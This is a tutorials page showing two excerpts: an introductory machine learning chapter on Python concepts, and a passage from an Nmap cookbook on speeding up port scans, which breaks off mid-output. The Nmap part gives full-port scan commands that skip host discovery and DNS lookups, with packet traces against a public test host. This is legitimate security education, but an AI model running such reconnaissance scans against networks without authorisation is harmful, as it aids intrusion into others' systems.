Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletter Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

How-To Tutorials

7008 Articles
article-image-getting-started-python-and-machine-learning
Packt
23 Jun 2017
34 min read
Save for later

Getting Started with Python and Machine Learning

Packt
23 Jun 2017
34 min read
In this article by Ivan Idris, Yuxi (Hayden) Liu, and Shoahoa Zhang author of the book Python Machine Learning By Example we cover basic machine learning concepts. If you need more information, then your local library, the Internet, and Wikipedia in particular should help you further. The topics that will be covered in this article are as follows: (For more resources related to this topic, see here.) What is machine learning and why do we need it? A very high level overview of machine learning Generalizing with data Overfitting and the bias variance trade off Dimensions and features Preprocessing, exploration, and feature engineering Combining models Installing software and setting up Troubleshooting and asking for help What is machine learning and why do we need it? Machine learning is a term coined around 1960 composed of two words – machine corresponding to a computer, robot, or other device, and learning an activity, which most humans are good at. So we want machines to learn, but why not leave learning to the humans? It turns out that there are many problems involving huge datasets, for instance, where it makes sense to let computers do all the work. In general, of course, computers and robots don't get tired, don't have to sleep, and may be cheaper. There is also an emerging school of thought called active learning or human-in-the-loop, which advocates combining the efforts of machine learners and humans. The idea is that there are routine boring tasks more suitable for computers, and creative tasks more suitable for humans. According to this philosophy machines are able to learn, but not everything. Machine learning doesn't involve the traditional type of programming that uses business rules. A popular myth says that the majority of the code in the world has to do with simple rules possibly programmed in Cobol, which covers the bulk of all the possible scenarios of client interactions. So why can't we just hire many coders and continue programming new rules? One reason is the cost of defining and maintaining rules becomes very expensive over time. A lot of the rules involve matching strings or numbers, and change frequently. It's much easier and more efficient to let computers figure out everything themselves from data. Also the amount of data is increasing, and actually the rate of growth is itself accelerating. Nowadays the floods of textual, audio, image, and video data are hard to fathom. The Internet of Things is a recent development of a new kind of Internet, which interconnects everyday devices. The Internet of Things will bring data from household appliances and autonomous cars to the forefront. The average company these days has mostly human clients, but for instance social media companies tend to have many bot accounts. This trend is likely to continue and we will have more machines talking to each other. An application of machine learning that you may be familiar is the spam filter, which filters e-mails considered to be spam. Another is online advertising where ads are served automatically based on information advertisers have collected about us. Yet another application of machine learning is search engines. Search engines extract information about web pages, so that you can efficiently search the Web. Many online shops and retail companies have recommender engines, which recommend products and services using machine learning. The list of applications is very long and also includes fraud detection, medical diagnosis, sentiment analysis, and financial market analysis. In the 1983, War Games movie a computer made life and death decisions, which could have resulted in Word War III. As far as I know technology wasn't able to pull off such feats at the time. However, in 1997 the Deep Blue supercomputer did manage to beat a world chess champion. In 2005, a Stanford self-driving car drove by itself for more than 130 kilometers in a desert. In 2007, the car of another team drove through regular traffic for more than 50 kilometers. In 2011, the Watson computer won a quiz against human opponents. In 2016 the AlphaGo program beat one of the best Go players in the world. If we assume that computer hardware is the limiting factor, then we can try to extrapolate into the future. Ray Kurzweil did just that and according to him, we can expect human level intelligence around 2029. A very high level overview of machine learning Machine learning is a subfield of artificial intelligence—a field of computer science concerned with creating systems, which mimic human intelligence. Software engineering is another field of computer science, and we can label Python programming as a type of software engineering. Machine learning is also closely related to linear algebra, probability theory, statistics, and mathematical optimization. We use optimization and statistics to find the best models, which explain our data. If you are not feeling confident about your mathematical knowledge, you probably are wondering, how much time you should spend learning or brushing up. Fortunately to get machine learning to work for you, most of the time you can ignore the mathematical details as they are implemented by reliable Python libraries. You do need to be able to program. As far as I know if you want to study machine learning, you can enroll into computer science, artificial intelligence, and more recently, data science masters. There are various data science bootcamps; however, the selection for those is stricter and the course duration is often just a couple of months. You can also opt for the free massively online courses available on the Internet. Machine learning is not only a skill, but also a bit of sport. You can compete in several machine learning competitions; sometimes for decent cash prizes. However, to win these competitions, you may need to utilize techniques, which are only useful in the context of competitions and not in the context of trying to solve a business problem. A machine learning system requires inputs—this can be numerical, textual, visual, or audiovisual data. The system usually has outputs, for instance, a floating point number, an integer representing a category (also called a class), or the acceleration of a self-driving car. We need to define (or have it defined for us by an algorithm) an evaluation function called loss or cost function, which tells us how well we are learning. In this setup, we create an optimization problem for us with the goal of learning in the most efficient way. For instance, if we fit data to a line also called linear regression, the goal is to have our line be as close as possible to the data points on average. We can have unlabeled data, which we want to group or explore – this is called unsupervised learning. Unsupervised learning can be used to detect anomalies, such as fraud or defective equipment. We can also have labeled examples to use for training—this is called supervised learning. The labels are usually provided by human experts, but if the problem is not too hard, they also may be produced by any members of the public through crowd sourcing for instance. Supervised learning is very common and we can further subdivide it in regression and classification. Regression trains on continuous target variables, while classification attempts to find the appropriate class label. If not all examples are labeled, but still some are we have semi supervised learning. A chess playing program usually applies reinforcement learning—this is a type of learning where the program evaluates its own performance by, for instance playing against itself or earlier versions of itself. We can roughly categorize machine learning algorithms in logic-based learning, statistical learning, artificial neural networks, and genetic algorithms. In fact, we have a whole zoo of algorithms with popularity varying over time. The logic-based systems were the first to be dominant. They used basic rules specified by human experts, and with these rules systems tried to reason using formal logic. In the mid-1980s, artificial neural networks came to the foreground, to be then pushed aside by statistical learning systems in the 1990s. Artificial neural networks imitate animal brains, and consist of interconnected neurons that are also an imitation of biological neurons. Genetic algorithms were pretty popular in the 1990s (or at least that was my impression). Genetic algorithms mimic the biological process of evolution. We are currently (2016) seeing a revolution in deep learning, which we may consider to be a rebranding of neural networks. The term deep learning was coined around 2006, and it refers to deep neural networks with many layers. The breakthrough in deep learning is amongst others caused by the availability of graphics processing units (GPU), which speed up computation considerably. GPUs were originally intended to render video games, and are very good in parallel matrix and vector algebra. It is believed that deep learning resembles, the way humans learn, therefore it may be able to deliver on the promise of sentient machines. You may have heard of Moore's law—an empirical law, which claims that computer hardware improves exponentially with time. The law was first formulated by Gordon Moore, the co-founder of Intel, in 1965. According to the law the number of transistors on a chip should double every two years. In the following graph, you can see that the law holds up nicely (the size of the bubbles corresponds to the average transistor count in GPUs): The consensus seems to be that Moore's law should continue to be valid for a couple of decades. This gives some credibility to Ray Kurzweil's predictions of achieving true machine intelligence in 2029. We will encounter many of the types of machine learning later in this book. Most of the content is about supervised learning with some examples of unsupervised learning. The popular Python libraries support all these types of learning. Generalizing with data The good thing about data is that we have a lot of data in the world. The bad thing is that it is hard to process this data. The challenges stem from the diversity and noisiness of the data. We as humans, usually process data coming in our ears and eyes. These inputs are transformed into electrical or chemical signals. On a very basic level computers and robots also work with electrical signals. These electrical signals are then translated into ones and zeroes. However, we program in Python in this book, and on that level normally we represent the data either as numbers, images, or text. Actually images and text are not very convenient, so we need to transform images and text into numerical values. Especially in the context of supervised learning we have a scenario similar to studying for an exam. We have a set of practice questions and the actual exam. We should be able to answer exam questions without knowing the answers for them. This is called generalization – we learn something from our practice questions and hopefully are able to apply this knowledge to other similar questions. Finding good representative examples is not always an easy task depending on the complexity of the problem we are trying to solve and how generic the solution needs to be. An old-fashioned programmer would talk to a business analyst or other expert, and then implement a rule that adds a certain value multiplied by another value corresponding for instance to tax rules. In a machine learning setup we can give the computer example input values and example output values. Or if we are more ambitious, we can feed the program the actual tax texts and let the machine process the data further just like an autonomous car doesn't need a lot of human input. This means implicitly that there is some function, for instance, a tax formula that we are trying to find. In physics we have almost the same situation. We want to know how the universe works, and formulate laws in a mathematical language. Since we don't know the actual function all we can do is measure what our error is, and try to minimize it. In supervised learning we compare our results against the expected values. In unsupervised learning we measure our success with related metrics. For instance, we want clusters of data to be well defined. In reinforcement learning a program evaluates its moves, for example, in a chess game using some predefined function. Overfitting and the bias variance trade off Overfitting, (one word) is such an important concept, that I decided to start discussing it very early in this book. If you go through many practice questions for an exam, you may start to find ways to answer questions, which have nothing to do with the subject material. For instance, you may find that if you have the word potato in the question, the answer is A, even if the subject has nothing to do with potatoes. Or even worse, you may memorize the answers for each question verbatim. We can then score high on the practice questions, which are called the train set in machine learning. However, we will score very low on the exam questions, which are called the test set in machine learning. This phenomenon of memorization is called bias. Overfitting almost always means that we are trying too hard to extract information from the data (random quirks), and using more training data will not help. The opposite scenario is called underfitting. When we underfit we don't have a very good result on the train set, but also not a very good result on the test set. Underfitting may indicate that we are not using enough data, or that we should try harder to do something useful with the data. Obviously we want to avoid both scenarios. Machine learning errors are the sum of bias and variance. Variance measures how much the error varies. Imagine that we are trying to decide what to wear based on the weather outside. If you have grown up in a country with a tropical climate, you may be biased towards always wearing summer clothes. If you lived in a cold country, you may decide to go to a beach in Bali wearing winter clothes. Both decisions have high bias. You may also just wear random clothes that are not appropriate for the weather outside – this is an outcome with high variance. It turns out that when we try to minimize bias or variance, we tend to increase the other – a concept known as the bias variance tradeoff. The expected error is given by the following equation: The last term is the irreducible error. Cross-validation Cross-validation is a technique, which helps to avoid overfitting. Just like we would have a separation of practice questions and exam questions, we also have training sets and test sets. It's important to keep the data separated and only use the test set in the final stage. There are many cross-validation schemes in use. The most basic setup splits the data given a specified percentage – for instance 75 % train data and 25 % test set. We can also leave out a fixed number of observations in multiple rounds, so that these items are in the test set, and the rest of the data is in the train set. For instance, we can apply leave-one-outcross-validation (LOOCV) and let each datum be in the test set once. For a large dataset LOOCV requires as many rounds as there are data items, and can therefore be too slow. The k-fold cross-validation performs better than LOOCV and randomly splits the data into k (a positive integer) folds. One of the folds becomes the test set, and the rest of the data becomes the train set. We repeat this process k times with each fold being the designated test set once. Finally, we average the k train and test errors for the purpose of evaluation. Common values for k are five and ten. The following table illustrates the setup for five folds: Iteration Fold 1 Fold 2 Fold 3 Fold 4 Fold 5 1 Test Train Train Train Train 2 Train Test Train Train Train 3 Train Train Test Train Train 4 Train Train Train Test Train 5 Train Train Train Train Test  We can also randomly split the data into train and test set multiple times. The problem with this algorithm is that some items may never end in the test set, while others may be selected in the test set multiple times. The nested cross-validation is a combination of cross-validations. Nested cross-validation consists of the following cross-validations: The inner cross-validation does optimization to find the best fit, and can be implemented as k-fold cross validation. The outer cross-validation is used to evaluate performance and do statistical analysis. Regularization Regularization like cross-validation is a general technique to fight overfitting. Regularization adds extra parameters to the error function we are trying to minimize, in order to penalize complex models. For instance, if we are trying to fit a curve to a high order polynomial, we may use regularization to reduce the influence of the higher degrees, thereby effectively reducing the order of the polynomial. Simpler methods are to be preferred, at least according to the principle of Occam's razor. William Occam was a monk and philosopher who around 1320 came up with the idea that the simplest hypothesis that fits data should be preferred. One justification is that you can invent fewer simple models than complex models. For instance, intuitively we know that there are more higher polynomial models than linear ones. The reason is that a line (f(x) = ax + b) is governed by only two numbers – the intercept b and slope a. The possible coefficients for a line span two-dimensional space. A quadratic polynomial adds an extra coefficient for the quadratic term, and we can span a three-dimensional space with the coefficients. Therefore it is less likely that we find a linear model than more complex models, because the search space for linear models is much smaller (although it is infinite). And of course simpler models are just easier to use and require less computation time. We can also stop a program early as a form of regularization. If we give a machine learner less time it is more likely to produce a simpler model, and we hope less likely to overfit. Of course, we have to do this in an ordered fashion, so this means that the algorithm should be aware of the possibility of early termination. Dimensions and features We typically represent the data as a grid of numbers (a matrix). Each column represents a variable, which we call a feature in machine learning. In supervised learning one of the variables is actually not a feature, but the label that we are trying to predict. And in supervised learning each row is an example that we can use for training or testing. The number of features corresponds to the dimensionality of the data. Our machine learning approach depends on the number of dimensions versus the number of examples. For instance, text and image data are very high dimensional, while stock market data has relatively fewer dimensions. Fitting high dimensional data is computationally expensive, and is also prone to overfitting due to the high complexity. Higher dimensions are also impossible to visualize, and therefore we can't use simple diagnostic methods. Not all the features are useful and they may only add randomness to our results. It is therefore often important to do good feature selection. Feature selection is a form of dimensionality reduction. Some machine learning algorithms are actually able to automatically perform feature selection. We should be careful not to omit features that do contain information. Some practitioners evaluate the correlation of a single feature and the target variable. In my opinion you shouldn't do that, because correlation of one variable with the target in itself doesn't tell you much, instead use an off-the-shelf algorithm and evaluate the results of different feature subsets. In principle, feature selection boils down to multiple binary decisions whether to include a feature or not. For n features we get 2n feature sets, which can be a very large number for a large number of features. For example, for 10 features we have 1024 possible feature sets (for instance if we are deciding what clothes to wear the features can be temperature, rain, the weather forecast, where we are going, and so on). At a certain point brute force evaluation becomes infeasible. We will discuss better methods in this book. Basically we have two options: we either start with all the features, and remove features iteratively or we start with a minimum set of features and add features iteratively. We then take the best feature sets for each iteration, and then compare them. Another common dimensionality reduction approach is to transform high-dimensional data in lower-dimensional space. This transformation leads to information loss, but we can keep the loss to a minimum. We will cover this in more detail later on. Preprocessing, exploration, and feature engineering Data mining, a buzzword in the 1990 is the predecessor of data science (the science of data). One of the methodologies popular in the data mining community is called cross industry standard process for data mining (CRISP DM). CRISP DM was created in 1996, and is still used today. I am not endorsing CRISP DM, however I like its general framework. The CRISP DM consists of the following phases, which are not mutually exclusive and can occur in parallel: Business understanding: This phase is often taken care of by specialized domain experts. Usually we have a business person formulate a business problem, such as selling more units of a certain product. Data understanding: This is also a phase, which may require input from domain experts, however, often a technical specialist needs to get involved more than in the business understanding phase. The domain expert may be proficient with spreadsheet programs, but have trouble with complicated data. In this book I usually call this phase exploration. Data preparation: This is also a phase where a domain expert with only Excel knowhow may not be able to help you. This is the phase where we create our training and test datasets. In this book I usually call this phase preprocessing. Modeling: This is the phase, which most people associate with machine learning. In this phase we formulate a model, and fit our data. Evaluation: In this phase, we evaluate our model, and our data to check whether we were able to solve our business problem. Deployment: This phase usually involves setting up the system in a production environment (it is considered good practice to have a separate production system). Typically this is done a specialized team. When we learn, we require high quality learning material. We can't learn from gibberish, so we automatically ignore anything that doesn't make sense. A machine learning system isn't able to recognize gibberish, so we need to help it by cleaning the input data. It is often claimed that cleaning the data forms a large part of machine learning. Sometimes cleaning is already done for us, but you shouldn't count on it. To decide how to clean the data, we need to be familiar with the data. There are some projects, which try to automatically explore the data, and do something intelligent, like producing a report. For now unfortunately we don't have a solid solution, so you need to do some manual work. We can do two things, which are not mutually exclusive – first scan the data and second visualizing the data. This also depends on the type of data we are dealing with whether we have a grid of numbers, images, audio, text, or something else. At the end, a grid of numbers is the most convenient form, and we will always work towards having numerical features. We want to know if features miss values, how the values are distributed and what type of features we have. Values can approximately follow a Normal distribution, a Binomial distribution, a Poisson distribution or another distribution altogether. Features can be binary – either yes or no, positive or negative, and so on. They can also be categorical – pertaining to a category, for instance continents (Africa, Asia, Europe, Latin America, North America, and so on).Categorical variables can also be ordered – for instance high, medium, and low. Features can also be quantitative – for example temperature in degrees or price in dollars. Feature engineering is the process of creating or improving features. It's more of a dark art than a science. Features are often created based on common sense, domain knowledge or prior experience. There are certain common techniques for feature creation, however there is no guarantee that creating new features will improve your results. We are sometimes able to use the clusters found by unsupervised learning as extra features. Deep neural networks are often able to create features automatically. Missing values Quite often we miss values for certain features. This could happen for various reasons. It can be inconvenient, expensive or even impossible to always have a value. Maybe we were not able to measure a certain quantity in the past, because we didn't have the right equipment, or we just didn't know that the feature is relevant. However, we are stuck with missing values from the past. Sometimes it's easy to figure out that we miss values and we can discover this just by scanning the data, or counting the number of values we have for a feature and comparing to the number of values we expect based on the number of rows. Certain systems encode missing values with for example values as 999999. This makes sense if the valid values are much smaller than 999999. If you are lucky you will have information about the features provided by whoever created the data in the form of a data dictionary or metadata. Once we know that we miss values the question arises of how to deal with them. The simplest answer is to just ignore them. However, some algorithms can't deal with missing values, and the program will just refuse to continue. In other circumstances ignoring missing values will lead to inaccurate results. The second solution is to substitute missing values by a fixed value – this is called imputing. We can impute the arithmetic mean, median or mode of the valid values of a certain feature. Ideally, we will have a relation between features or within a variable that is somewhat reliable. For instance, we may know the seasonal averages of temperature for a certain location and be able to impute guesses for missing temperature values given a date. Label encoding Humans are able to deal with various types of values. Machine learning algorithms with some exceptions need numerical values. If we offer a string such as Ivan unless we are using specialized software the program will not know what to do. In this example we are dealing with a categorical feature – names probably. We can consider each unique value to be a label. (In this particular example we also need to decide what to do with the case – is Ivan the same as ivan). We can then replace each label by an integer – label encoding. This approach can be problematic, because the learner may conclude that there is an ordering. One hot encoding The one-of-K or one-hot-encoding scheme uses dummy variables to encode categorical features. Originally it was applied to digital circuits. The dummy variables have binary values like bits, so they take the values zero or one (equivalent to true or false). For instance, if we want to encode continents we will have dummy variables, such as is_asia, which will be true if the continent is Asia and false otherwise. In general, we need as many dummy variables, as there are unique labels minus one. We can determine one of the labels automatically from the dummy variables, because the dummy variables are exclusive. If the dummy variables all have a false value, then the correct label is the label for which we don't have a dummy variable. The following table illustrates the encoding for continents:   Is_africa Is_asia Is_europe Is_south_america Is_north_america Africa True False False False False Asia False True False False False Europe False False True False False South America False False False True False North America False False False False True Other False False False False False  The encoding produces a matrix (grid of numbers) with lots of zeroes (false values) and occasional ones (true values). This type of matrix is called a sparse matrix. The sparse matrix representation is handled well by the SciPy package, and shouldn't be an issue. We will discuss the SciPy package later in this article. Scaling Values of different features can differ by orders of magnitude. Sometimes this may mean that the larger values dominate the smaller values. This depends on the algorithm we are using. For certain algorithms to work properly we are required to scale the data. There are several common strategies that we can apply: Standardization removes the mean of a feature and divides by the standard deviation. If the feature values are normally distributed, we will get a Gaussian, which is centered around zero with a variance of one. If the feature values are not normally distributed, we can remove the median and divide by the interquartile range. The interquartile range is a range between the first and third quartile (or 25th and 75th percentile). Scaling features to a range is a common choice of range which is a range between zero and one. Polynomial features If we have two features a and b, we can suspect that there is a polynomial relation, such as a2 + ab + b2. We can consider each term in the sum to be a feature – in this example we have three features. The product ab in the middle is called an interaction. An interaction doesn't have to be a product, although this is the most common choice, it can also be a sum, a difference or a ratio. If we are using a ratio to avoid dividing by zero, we should add a small constant to the divisor and dividend. The number of features and the order of the polynomial for a polynomial relation are not limited. However, if we follow Occam's razor we should avoid higher order polynomials and interactions of many features. In practice, complex polynomial relations tend to be more difficult to compute and not add much value, but if you really need better results they may be worth considering. Power transformations Power transforms are functions that we can use to transform numerical features into a more convenient form, for instance to conform better to a normal distribution. A very common transform for values, which vary by orders of magnitude, is to take the logarithm. Taking the logarithm of a zero and negative values is not defined, so we may need to add a constant to all the values of the related feature before taking the logarithm. We can also take the square root for positive values, square the values or compute any other power we like. Another useful transform is the Box-Cox transform named after its creators. The Box-Cox transform attempts to find the best power need to transform the original data into data that is closer to the normal distribution. The transform is defined as follows: Binning Sometimes it's useful to separate feature values into several bins. For example, we may be only interested whether it rained on a particular day. Given the precipitation values we can binarize the values, so that we get a true value if the precipitation value is not zero, and a false value otherwise. We can also use statistics to divide values into high, low, and medium bins. The binning process inevitably leads to loss of information. However, depending on your goals this may not be an issue, and actually reduce the chance of overfitting. Certainly there will be improvements in speed and memory or storage requirements. Combining models In (high) school we sit together with other students, and learn together, but we are not supposed to work together during the exam. The reason is, of course, that teachers want to know what we have learned, and if we just copy exam answers from friends, we may have not learned anything. Later in life we discover that teamwork is important. For example, this book is the product of a whole team, or possibly a group of teams. Clearly a team can produce better results than a single person. However, this goes against Occam's razor, since a single person can come up with simpler theories compared to what a team will produce. In machine learning we nevertheless prefer to have our models cooperate with the following schemes: Bagging Boosting Stacking Blending Voting and averaging Bagging Bootstrap aggregating or bagging is an algorithm introduced by Leo Breiman in 1994, which applies bootstrapping to machine learning problems. Bootstrapping is a statistical procedure, which creates datasets from existing data by sampling with replacement. Bootstrapping can be used to analyze the possible values that arithmetic mean, variance or other quantity can assume. The algorithm aims to reduce the chance of overfitting with the following steps: We generate new training sets from input train data by sampling with replacement. Fit models to each generated training set. Combine the results of the models by averaging or majority voting. Boosting In the context of supervised learning we define weak learners as learners that are just a little better than a baseline such as randomly assigning classes or average values. Although weak learners are weak individually like ants, together they can do amazing things just like ants can. It makes sense to take into account the strength of each individual learner using weights. This general idea is called boosting. There are many boosting algorithms; boosting algorithms differ mostly in their weighting scheme. If you have studied for an exam, you may have applied a similar technique by identifying the type of practice questions you had trouble with and focusing on the hard problems. Face detection in images is based on a specialized framework, which also uses boosting. Detecting faces in images or videos is a supervised learning. We give the learner examples of regions containing faces. There is an imbalance, since we usually have far more regions (about ten thousand times more) that don't have faces. A cascade of classifiers progressively filters out negative image areas stage by stage. In each progressive stage the classifiers use progressively more features on fewer image windows. The idea is to spend the most time on image patches, which contain faces. In this context boosting is used to select features and combine results. Stacking Stacking takes the outputs of machine learning estimators and then uses those as inputs for another algorithm. You can, of course, feed the output of the higher-level algorithm to another predictor. It is possible to use any arbitrary topology, but for practical reasons you should try a simple setup first as also dictated by Occam's razor. Blending Blending was introduced by the winners of the one million dollar Netflix prize. Netflix organized a contest with the challenge of finding the best model to recommend movies to their users. Netflix users can rate a movie with a rating of one to five stars. Obviously each user wasn't able to rate each movie, so the user movie matrix is sparse. Netflix published an anonymized training and test set. Later researchers found a way to correlate the Netflix data to IMDB data. For privacy reasons the Netflix data is no longer available. The competition was won in 2008 by a group of teams combining their models. Blending is a form of stacking. The final estimator in blending however trains only on a small portion of the train data. Voting and averaging We can arrive at our final answer through majority voting or averaging. It's also possible to assign different weights to each model in the ensemble. For averaging we can also use the geometric mean or the harmonic mean instead of the arithmetic mean. Usually combining the results of models, which are highly correlated to each other doesn't lead to spectacular improvements. It's better to somehow diversify the models, by using different features or different algorithms. If we find that two models are strongly correlated, we may for example decide to remove one of them from the ensemble, and increase proportionally the weight of the other model. Installing software and setting up For most projects in this book we need scikit-learn (Refer, http://scikit-learn.org/stable/install.html) and matplotlib (Refer, http://matplotlib.org/users/installing.html). Both packages require NumPy, but we also need SciPy for sparse matrices as mentioned before. The scikit-learn library is a machine learning package, which is optimized for performance as a lot of the code runs almost as fast as equivalent C code. The same statement is true for NumPy and SciPy. There are various ways to speed up the code, however they are out of scope for this book, so if you want to know more, please consult the documentation. Matplotlib is a plotting and visualization package. We can also use the seaborn package for visualization. Seaborn uses matplotlib under the hood. There are several other Python visualization packages that cover different usage scenarios. Matplotlib and seaborn are mostly useful for the visualization for small to medium datasets. The NumPy package offers the ndarray class and various useful array functions. The ndarray class is an array, that can be one or multi-dimensional. This class also has several subclasses representing matrices, masked arrays, and heterogeneous record arrays. In machine learning we mainly use NumPy arrays to store feature vectors or matrices composed of feature vectors. SciPy uses NumPy arrays and offers a variety of scientific and mathematical functions. We also require the pandas library for data wrangling. In this book we will use Python 3. As you may know Python 2 will no longer be supported after 2020, so I strongly recommend switching to Python 3. If you are stuck with Python 2 you still should be able to modify the example code to work for you. In my opinion the Anaconda Python 3 distribution is the best option. Anaconda is a free Python distribution for data analysis and scientific computing. It has its own package manager conda. The distribution includes more than 200 Python packages, which makes it very convenient. For casual users the Miniconda distribution may be the better choice. Miniconda contains the conda package manager and Python. The procedures to install Anaconda and Miniconda are similar. Obviously, Anaconda takes more disk space. Follow the instructions from the Anaconda website at http://conda.pydata.org/docs/install/quick.html. First, you have to download the appropriate installer for your operating system and Python version. Sometimes you can choose between a GUI and a command line installer. I used the Python 3 installer, although my system Python version is 2.7. This is possible since Anaconda comes with its own Python. On my machine the Anaconda installer created an anaconda directory in my home directory and required about 900 MB. The Miniconda installer installs a miniconda directory in your home directory. Installation instructions for NumPy are at http://docs.scipy.org/doc/numpy/user/install.html. Alternatively install NumPy with pip as follows: $ [sudo] pip install numpy The command for Anaconda users is: $ conda install numpy To install the other dependencies substitute NumPy by the appropriate package. Please read the documentation carefully, not all options work equally well for each operating system. The pandas installation documentation is at http://pandas.pydata.org/pandas-docs/dev/install.html. Troubleshooting and asking for help Currently the best forum is at http://stackoverflow.com. You can also reach out on mailing lists or IRC chat. The following is a list of mailing lists: Scikit-learn: https://lists.sourceforge.net/lists/listinfo/scikit-learn-general. NumPy and Scipy mailing list: https://www.scipy.org/scipylib/mailing-lists.html. IRC channels: #scikit-learn @ freenode #scipy @ freenode Summary In this article we covered the basic concepts of machine learning, a high level overview, generalizing with data, overfitting, dimensions and features, preprocessing, combining models, installing the required software and some places where you can ask for help. Resources for Article: Further resources on this subject: Machine learning and Python – the Dream Team Machine Learning in IPython with scikit-learn How to do Machine Learning with Python
Read more
  • 0
  • 0
  • 15163

article-image-optimize-scans
Packt
23 Jun 2017
20 min read
Save for later

To Optimize Scans

Packt
23 Jun 2017
20 min read
In this article by Paulino Calderon Pale author of the book Nmap Network Exploration and Security Auditing Cookbook, Second Edition, we will explore the following topics: Skipping phases to speed up scans Selecting the correct timing template Adjusting timing parameters Adjusting performance parameters (For more resources related to this topic, see here.) One of my favorite things about Nmap is how customizable it is. If configured properly, Nmap can be used to scan from single targets to millions of IP addresses in a single run. However, we need to be careful and need to understand the configuration options and scanning phases that can affect performance, but most importantly, really think about our scan objective beforehand. Do we need the information from the reverse DNS lookup? Do we know all targets are online? Is the network congested? Do targets respond fast enough? These and many more aspects can really add up to your scanning time. Therefore, optimizing scans is important and can save us hours if we are working with many targets. This article starts by introducing the different scanning phases, timing, and performance options. Unless we have a solid understanding of what goes on behind the curtains during a scan, we won't be able to completely optimize our scans. Timing templates are designed to work in common scenarios, but we want to go further and shave off those extra seconds per host during our scans. Remember that this can also not only improve performance but accuracy as well. Maybe those targets marked as offline were only too slow to respond to the probes sent after all. Skipping phases to speed up scans Nmap scans can be broken in phases. When we are working with many hosts, we can save up time by skipping tests or phases that return information we don't need or that we already have. By carefully selecting our scan flags, we can significantly improve the performance of our scans. This explains the process that takes place behind the curtains when scanning, and how to skip certain phases to speed up scans. How to do it... To perform a full port scan with the timing template set to aggressive, and without the reverse DNS resolution (-n) or ping (-Pn), use the following command: # nmap -T4 -n -Pn -p- 74.207.244.221 Note the scanning time at the end of the report: Nmap scan report for 74.207.244.221 Host is up (0.11s latency). Not shown: 65532 closed ports PORT     STATE SERVICE 22/tcp   open ssh 80/tcp   open http 9929/tcp open nping-echo Nmap done: 1 IP address (1 host up) scanned in 60.84 seconds Now, compare the running time that we get if we don't skip any tests: # nmap -p- scanme.nmap.org Nmap scan report for scanme.nmap.org (74.207.244.221) Host is up (0.11s latency). Not shown: 65532 closed ports PORT     STATE SERVICE 22/tcp   open ssh 80/tcp   open http 9929/tcp open nping-echo Nmap done: 1 IP address (1 host up) scanned in 77.45 seconds Although the time difference isn't very drastic, it really adds up when you work with many hosts. I recommend that you think about your objectives and the information you need, to consider the possibility of skipping some of the scanning phases that we will describe next. How it works... Nmap scans are divided in several phases. Some of them require some arguments to be set to run, but others, such as the reverse DNS resolution, are executed by default. Let's review the phases that can be skipped and their corresponding Nmap flag: Target enumeration: In this phase, Nmap parses the target list. This phase can't exactly be skipped, but you can save DNS forward lookups using only the IP addresses as targets. Host discovery: This is the phase where Nmap establishes if the targets are online and in the network. By default, Nmap sends an ICMP echo request and some additional probes, but it supports several host discovery techniques that can even be combined. To skip the host discovery phase (no ping), use the flag -Pn. And we can easily see what probes we skipped by comparing the packet trace of the two scans: $ nmap -Pn -p80 -n --packet-trace scanme.nmap.org SENT (0.0864s) TCP 106.187.53.215:62670 > 74.207.244.221:80 S ttl=46 id=4184 iplen=44 seq=3846739633 win=1024 <mss 1460> RCVD (0.1957s) TCP 74.207.244.221:80 > 106.187.53.215:62670 SA ttl=56 id=0 iplen=44 seq=2588014713 win=14600 <mss 1460> Nmap scan report for scanme.nmap.org (74.207.244.221) Host is up (0.11s latency). PORT   STATE SERVICE 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds For scanning without skipping host discovery, we use the command: $ nmap -p80 -n --packet-trace scanme.nmap.orgSENT (0.1099s) ICMP 106.187.53.215 > 74.207.244.221 Echo request (type=8/code=0) ttl=59 id=12270 iplen=28 SENT (0.1101s) TCP 106.187.53.215:43199 > 74.207.244.221:443 S ttl=59 id=38710 iplen=44 seq=1913383349 win=1024 <mss 1460> SENT (0.1101s) TCP 106.187.53.215:43199 > 74.207.244.221:80 A ttl=44 id=10665 iplen=40 seq=0 win=1024 SENT (0.1102s) ICMP 106.187.53.215 > 74.207.244.221 Timestamp request (type=13/code=0) ttl=51 id=42939 iplen=40 RCVD (0.2120s) ICMP 74.207.244.221 > 106.187.53.215 Echo reply (type=0/code=0) ttl=56 id=2147 iplen=28 SENT (0.2731s) TCP 106.187.53.215:43199 > 74.207.244.221:80 S ttl=51 id=34952 iplen=44 seq=2609466214 win=1024 <mss 1460> RCVD (0.3822s) TCP 74.207.244.221:80 > 106.187.53.215:43199 SA ttl=56 id=0 iplen=44 seq=4191686720 win=14600 <mss 1460> Nmap scan report for scanme.nmap.org (74.207.244.221) Host is up (0.10s latency). PORT   STATE SERVICE 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 0.41 seconds Reverse DNS resolution: Host names often reveal by themselves additional information and Nmap uses reverse DNS lookups to obtain them. This step can be skipped by adding the argument -n to your scan arguments. Let's see the traffic generated by the two scans with and without reverse DNS resolution. First, let's skip reverse DNS resolution by adding -n to your command: $ nmap -n -Pn -p80 --packet-trace scanme.nmap.orgSENT (0.1832s) TCP 106.187.53.215:45748 > 74.207.244.221:80 S ttl=37 id=33309 iplen=44 seq=2623325197 win=1024 <mss 1460> RCVD (0.2877s) TCP 74.207.244.221:80 > 106.187.53.215:45748 SA ttl=56 id=0 iplen=44 seq=3220507551 win=14600 <mss 1460> Nmap scan report for scanme.nmap.org (74.207.244.221) Host is up (0.10s latency). PORT   STATE SERVICE 80/tcp open http   Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds And if we try the same command but not' skipping reverse DNS resolution, as follows: $ nmap -Pn -p80 --packet-trace scanme.nmap.org NSOCK (0.0600s) UDP connection requested to 106.187.36.20:53 (IOD #1) EID 8 NSOCK (0.0600s) Read request from IOD #1 [106.187.36.20:53] (timeout: -1ms) EID                                                 18 NSOCK (0.0600s) UDP connection requested to 106.187.35.20:53 (IOD #2) EID 24 NSOCK (0.0600s) Read request from IOD #2 [106.187.35.20:53] (timeout: -1ms) EID                                                 34 NSOCK (0.0600s) UDP connection requested to 106.187.34.20:53 (IOD #3) EID 40 NSOCK (0.0600s) Read request from IOD #3 [106.187.34.20:53] 